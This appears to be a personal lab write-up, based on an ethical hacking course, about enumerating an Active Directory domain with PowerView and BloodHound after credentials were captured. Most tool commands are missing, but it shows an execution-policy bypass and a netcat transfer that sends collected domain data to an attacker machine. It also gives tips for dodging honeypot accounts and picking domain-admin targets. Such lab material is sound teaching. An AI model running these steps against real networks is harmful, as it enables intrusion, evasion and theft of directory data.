Post enumeration of lab with credentials/hashes captured. Overview of PowerView and Bloodhound setup/usage.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Based off TheCyberMentor amazing Udemy course available at https://www.udemy.com/course/practical-ethical-hacking/
Requirements: With credentials recovered from the mitm attack we can use tools
- PowerView — Link: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
PowerView.ps1 to target
Execute policy bypass (used to execute scripts - not security)
Very powerful tool with more information available via cheat sheet:
Get Domain Policy:
find password length and just start attacking with 7 chars passwords.
Long semi unreadable list
List property we can search for via pipe:
Find properties of the passwords last set:
can find if we have stale passwords on the network.
Check Logon Count (used to identify honeypot accounts):
Check bad password counts (You can see if an account is under attack):
List all network domain computers:
Slightly too much information
Find the operating systems:
Pick apart the network as to which are the servers.
Find Domain Admins
Get Members of Admins
Find All SMB Shares on the Network:
Find All Group Policies:
Check GPO for changes in displaynames and when they were changed:
condensed version of larger output.
Downloads the data from Active Directory and put into a visual graph.
neo4j console setup neo4j - change default passwords
open at link:
neo4j:neo4j - prompted to change password
opted to used kali password.
Launch Bloodhound - Linux/Kali
Login with neo4j account and neo4j account URL. - Bloodhoud setup and next step to pull data with injester.
Pull data with In-jester
- invoke bloodhound - powershell
- Place onto windows 10 machine
Within command prompt setup ep bypass
Move file to kali - Used
nc file transfer method - downloaded
nc.exe via SimpleHTTPServer on kali.
nc File Transfer Method:
- Kali setup listener: ncat -lvp 80 > file.zip
- Windows 10 machine nc -nv 192.168.175.129 80 < file.zip -w15
Import file.zip into Bloodhound Upload file.zip via upload button within bloodhound:
at this point my Bloodhound crashed when loading file.zip to which I attempted to reinstall… and failed. Moved to create for source… failed. All mainly due to the fact that i was on x86 version of Kali. Moved to Install Bloodhound on a Windows 10 machine following these directions:
Neoj4 BloodHound issues:
IMPORTANT: When you install java on the machine you will need to edit line 75:
and within the java folder you need to copy the “client” folder and paste it as “server”:
Launch Bloodhound - Windows
From this point was able to load the
file.zip into BloodHound:
Finding domain admins via “Find all Domain Admins” query
You will want to target boxes with Domain Admins have accounts.
- Locating High Value Targets via Query
to which paths get illuminated in red to follow
Once a network is compromised you can plan your next target with Bloodhound.